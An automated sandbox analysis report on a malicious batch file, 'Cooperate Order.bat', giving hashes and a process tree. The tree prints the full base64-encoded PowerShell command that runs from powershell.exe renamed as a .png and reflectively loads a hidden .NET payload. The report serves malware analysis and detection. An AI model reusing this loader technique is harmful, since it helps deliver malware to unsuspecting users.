862a1531be831680c2d17fb1a87f21d954b7acf60ffffb75e9adc5c2c73efa65

Resubmissions

30/10/2023, 20:33

231030-zb7plsfa8v 1

30/10/2023, 20:19

231030-y33pasfa3z 7

Analysis

max time kernel
1800s
max time network
1806s
platform
windows10-2004_x64
resource
win10v2004-20231023-en
resource tags

arch:x64arch:x86image:win10v2004-20231023-enlocale:en-usos:windows10-2004-x64system
submitted
30/10/2023, 20:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Cooperate Order.bat
Size

1.7MB
MD5

8e62541b4ad90e7320a908ba27023d50
SHA1

6ec1bd3040d35cad7d4a75f4ad7d10dee7f38085
SHA256

b10e325e1ba0a35a881e546c6fbedd3be9736bc42ec6f4c8e0bcdbb989ea2b14
SHA512

ded7c481cfa2cc971e9db845247f6c489fedc621f037e6a0c91153e6bcdff0ab38d63a75443f1f42297b88d32eac6c69d6323614a9fdf1ddc72bad111dd8da07
SSDEEP

24576:1bhlV1Oicaf/E/T9yK0vjMidwOLTsqIzibAVSYveHpazGDorvmrfOajhMoc+rmA2:30iKxrOvwiTIrhu7ZKPX+cW4

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 1 IoCs

pid	Process
3008	Ypesoxstvb.png

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
3008	Ypesoxstvb.png
3008	Ypesoxstvb.png

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	3008	Ypesoxstvb.png

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 3608 wrote to memory of 1620	3608	cmd.exe	87
PID 3608 wrote to memory of 1620	3608	cmd.exe	87
PID 3608 wrote to memory of 3296	3608	cmd.exe	88
PID 3608 wrote to memory of 3296	3608	cmd.exe	88
PID 3608 wrote to memory of 2256	3608	cmd.exe	90
PID 3608 wrote to memory of 2256	3608	cmd.exe	90
PID 2256 wrote to memory of 4224	2256	cmd.exe	92
PID 2256 wrote to memory of 4224	2256	cmd.exe	92
PID 2256 wrote to memory of 544	2256	cmd.exe	93
PID 2256 wrote to memory of 544	2256	cmd.exe	93
PID 2256 wrote to memory of 1636	2256	cmd.exe	94
PID 2256 wrote to memory of 1636	2256	cmd.exe	94
PID 2256 wrote to memory of 1532	2256	cmd.exe	95
PID 2256 wrote to memory of 1532	2256	cmd.exe	95
PID 2256 wrote to memory of 3008	2256	cmd.exe	96
PID 2256 wrote to memory of 3008	2256	cmd.exe	96

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Cooperate Order.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3608
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo F "
  2⤵
  PID:1620
- C:\Windows\system32\xcopy.exe
  xcopy /d /q /y /h /i C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Ypesoxstvb.png
  2⤵
  PID:3296
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\Cooperate Order.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2256
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo F "
    3⤵
    PID:4224
- - C:\Windows\system32\xcopy.exe
    xcopy /d /q /y /h /i C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Ypesoxstvb.png
    3⤵
    PID:544
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo F "
    3⤵
    PID:1636
- - C:\Windows\system32\xcopy.exe
    xcopy /d /q /y /h /i "C:\Users\Admin\AppData\Local\Temp\Cooperate Order.bat" C:\Users\Admin\AppData\Local\Temp\Ypesoxstvb.png.bat
    3⤵
    PID:1532
- - C:\Users\Admin\AppData\Local\Temp\Ypesoxstvb.png
    C:\Users\Admin\AppData\Local\Temp\Ypesoxstvb.png -win 1 -enc JABKAGQAbwBxAGEAbQB0AGkAIAA9ACAAWwBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQATABpAG4AZQBzACgAKAAoAFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkALgBNAGEAaQBuAE0AbwBkAHUAbABlAC4ARgBpAGwAZQBOAGEAbQBlACkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACIALgBiAGEAdAAiACkALAAgAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4ACkAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0AbABhAHMAdAAgADEAOwAgACQAUgB1AGMAZwByAHgAdgBrAGYAdwBxACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEoAZABvAHEAYQBtAHQAaQApADsAJABKAGIAawByAHMAZgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACAALAAgACQAUgB1AGMAZwByAHgAdgBrAGYAdwBxACAAKQA7ACQAbwB1AHQAcAB1AHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AOwAkAFIAYwBjAHUAawBtAHcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAgACQASgBiAGsAcgBzAGYALAAgACgAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAOwAkAFIAYwBjAHUAawBtAHcALgBDAG8AcAB5AFQAbwAoACAAJABvAHUAdABwAHUAdAAgACkAOwAkAFIAYwBjAHUAawBtAHcALgBDAGwAbwBzAGUAKAApADsAJABKAGIAawByAHMAZgAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAFIAdQBjAGcAcgB4AHYAawBmAHcAcQAgAD0AIAAkAG8AdQB0AHAAdQB0AC4AVABvAEEAcgByAGEAeQAoACkAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABSAHUAYwBnAHIAeAB2AGsAZgB3AHEAKQA7ACAAJABPAGMAbwBjAHMAYgByACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAFIAdQBjAGcAcgB4AHYAawBmAHcAcQApADsAIAAkAEIAZgBzAGcAcwBmAHYAIAA9ACAAJABPAGMAbwBjAHMAYgByAC4ARwBlAHQARQB4AHAAbwByAHQAZQBkAFQAeQBwAGUAcwAoACkAWwAwAF0AOwAgACQARAB4AHIAcQBiAGYAbQBpACAAPQAgACQAQgBmAHMAZwBzAGYAdgAuAEcAZQB0AE0AZQB0AGgAbwBkAHMAKAApAFsAMABdAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3008

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Ypesoxstvb.png

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ypesoxstvb.png.bat

Filesize
1.7MB

MD5
8e62541b4ad90e7320a908ba27023d50

SHA1
6ec1bd3040d35cad7d4a75f4ad7d10dee7f38085

SHA256
b10e325e1ba0a35a881e546c6fbedd3be9736bc42ec6f4c8e0bcdbb989ea2b14

SHA512
ded7c481cfa2cc971e9db845247f6c489fedc621f037e6a0c91153e6bcdff0ab38d63a75443f1f42297b88d32eac6c69d6323614a9fdf1ddc72bad111dd8da07

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_u23vfs3x.etn.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/3008-17-0x000001BA66ED0000-0x000001BA66EF2000-memory.dmp

Filesize
136KB

Download
memory/3008-18-0x00007FFE67290000-0x00007FFE67D51000-memory.dmp

Filesize
10.8MB

Download
memory/3008-19-0x000001BA7F6C0000-0x000001BA7F6D0000-memory.dmp

Filesize
64KB

Download
memory/3008-21-0x000001BA02720000-0x000001BA02878000-memory.dmp

Filesize
1.3MB

Download
memory/3008-22-0x000001BA02620000-0x000001BA0269A000-memory.dmp

Filesize
488KB

Download
memory/3008-23-0x000001BA02980000-0x000001BA029E6000-memory.dmp

Filesize
408KB

Download
memory/3008-24-0x000001BA029E0000-0x000001BA02AB4000-memory.dmp

Filesize
848KB

Download
memory/3008-25-0x000001BA02B90000-0x000001BA02C60000-memory.dmp

Filesize
832KB

Download
memory/3008-26-0x000001BA7F6C0000-0x000001BA7F6D0000-memory.dmp

Filesize
64KB

Download
memory/3008-27-0x00007FFE67290000-0x00007FFE67D51000-memory.dmp

Filesize
10.8MB

Download
memory/3008-28-0x000001BA7F6C0000-0x000001BA7F6D0000-memory.dmp

Filesize
64KB

Download
memory/3008-29-0x000001BA02C60000-0x000001BA02D68000-memory.dmp

Filesize
1.0MB

Download
memory/3008-31-0x000001BA02C60000-0x000001BA02D64000-memory.dmp

Filesize
1.0MB

Download
memory/3008-33-0x000001BA02C60000-0x000001BA02D64000-memory.dmp

Filesize
1.0MB

Download
memory/3008-30-0x000001BA02C60000-0x000001BA02D64000-memory.dmp

Filesize
1.0MB

Download
memory/3008-35-0x000001BA02C60000-0x000001BA02D64000-memory.dmp

Filesize
1.0MB

Download
memory/3008-37-0x000001BA02C60000-0x000001BA02D64000-memory.dmp

Filesize
1.0MB

Download
memory/3008-39-0x000001BA7F6C0000-0x000001BA7F6D0000-memory.dmp

Filesize
64KB

Download
memory/3008-40-0x000001BA02C60000-0x000001BA02D64000-memory.dmp

Filesize
1.0MB

Download
memory/3008-42-0x000001BA02C60000-0x000001BA02D64000-memory.dmp

Filesize
1.0MB

Download
memory/3008-44-0x000001BA02C60000-0x000001BA02D64000-memory.dmp

Filesize
1.0MB

Download
memory/3008-46-0x000001BA02C60000-0x000001BA02D64000-memory.dmp

Filesize
1.0MB

Download
memory/3008-48-0x000001BA02C60000-0x000001BA02D64000-memory.dmp

Filesize
1.0MB

Download
memory/3008-50-0x000001BA02C60000-0x000001BA02D64000-memory.dmp

Filesize
1.0MB

Download
memory/3008-52-0x000001BA02C60000-0x000001BA02D64000-memory.dmp

Filesize
1.0MB

Download
memory/3008-54-0x000001BA02C60000-0x000001BA02D64000-memory.dmp

Filesize
1.0MB

Download
memory/3008-56-0x000001BA02C60000-0x000001BA02D64000-memory.dmp

Filesize
1.0MB

Download
memory/3008-58-0x000001BA7F6C0000-0x000001BA7F6D0000-memory.dmp

Filesize
64KB

Download
memory/3008-59-0x000001BA02C60000-0x000001BA02D64000-memory.dmp

Filesize
1.0MB

Download
memory/3008-61-0x000001BA02C60000-0x000001BA02D64000-memory.dmp

Filesize
1.0MB

Download
memory/3008-63-0x000001BA02C60000-0x000001BA02D64000-memory.dmp

Filesize
1.0MB

Download
memory/3008-65-0x000001BA02C60000-0x000001BA02D64000-memory.dmp

Filesize
1.0MB

Download
memory/3008-67-0x000001BA02C60000-0x000001BA02D64000-memory.dmp

Filesize
1.0MB

Download
memory/3008-69-0x000001BA02C60000-0x000001BA02D64000-memory.dmp

Filesize
1.0MB

Download
memory/3008-71-0x000001BA02C60000-0x000001BA02D64000-memory.dmp

Filesize
1.0MB

Download
memory/3008-73-0x000001BA02C60000-0x000001BA02D64000-memory.dmp

Filesize
1.0MB

Download
memory/3008-75-0x000001BA02C60000-0x000001BA02D64000-memory.dmp

Filesize
1.0MB

Download
memory/3008-77-0x000001BA02C60000-0x000001BA02D64000-memory.dmp

Filesize
1.0MB

Download
memory/3008-79-0x000001BA02C60000-0x000001BA02D64000-memory.dmp

Filesize
1.0MB

Download
memory/3008-81-0x000001BA02C60000-0x000001BA02D64000-memory.dmp

Filesize
1.0MB

Download
memory/3008-84-0x000001BA7F6C0000-0x000001BA7F6D0000-memory.dmp

Filesize
64KB

Download
memory/3008-83-0x000001BA02C60000-0x000001BA02D64000-memory.dmp

Filesize
1.0MB

Download
memory/3008-86-0x000001BA02C60000-0x000001BA02D64000-memory.dmp

Filesize
1.0MB

Download
memory/3008-88-0x000001BA02C60000-0x000001BA02D64000-memory.dmp

Filesize
1.0MB

Download
memory/3008-90-0x000001BA02C60000-0x000001BA02D64000-memory.dmp

Filesize
1.0MB

Download
memory/3008-92-0x000001BA02C60000-0x000001BA02D64000-memory.dmp

Filesize
1.0MB

Download
memory/3008-94-0x000001BA02C60000-0x000001BA02D64000-memory.dmp

Filesize
1.0MB

Download
memory/3008-96-0x000001BA02C60000-0x000001BA02D64000-memory.dmp

Filesize
1.0MB

Download
memory/3008-708-0x000001BA7F6C0000-0x000001BA7F6D0000-memory.dmp

Filesize
64KB

Download
memory/3008-1001-0x000001BA7F6C0000-0x000001BA7F6D0000-memory.dmp

Filesize
64KB

Download
memory/3008-2227-0x000001BA02D70000-0x000001BA02E0E000-memory.dmp

Filesize
632KB

Download
memory/3008-2228-0x000001BA02E10000-0x000001BA02E5C000-memory.dmp

Filesize
304KB

Download